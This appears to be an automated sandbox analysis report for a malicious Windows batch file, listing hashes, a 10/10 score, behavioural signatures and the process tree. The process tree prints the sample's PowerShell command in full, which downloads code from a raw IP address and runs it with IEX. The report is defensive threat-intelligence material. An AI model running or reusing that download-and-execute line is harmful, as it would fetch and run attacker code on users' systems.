Analysis
-
max time kernel
60s -
max time network
61s -
platform
windows7_x64 -
resource
win7 -
submitted
10-07-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
2211aeb68404653c6a42054308cf95e6.bat
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
2211aeb68404653c6a42054308cf95e6.bat
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
2211aeb68404653c6a42054308cf95e6.bat
-
Size
219B
-
MD5
68b33bb8cfe6e6cfbc8be50a90b3084b
-
SHA1
8b32c94506fe4bc67c38f6c1dbb955603dbc2ba4
-
SHA256
2311d76b97db37109d14a91f693f468810b9e530aa7f6a9d75dc827757054d6a
-
SHA512
6a328a1dc19ccddef2bb9aeb38fe874646b7789083360bb026435cb799e93b5a578713a53b45bb52a1f75327bc763054ebf2d2c53d2657dd20d88f89f8f84928
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6
Signatures
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1492 wrote to memory of 892 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 892 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 892 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 892 1492 cmd.exe powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 892 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 892 powershell.exe 892 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 892 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2211aeb68404653c6a42054308cf95e6.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6');Invoke-LJICDRBAHEGJ;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/892-0-0x0000000000000000-mapping.dmp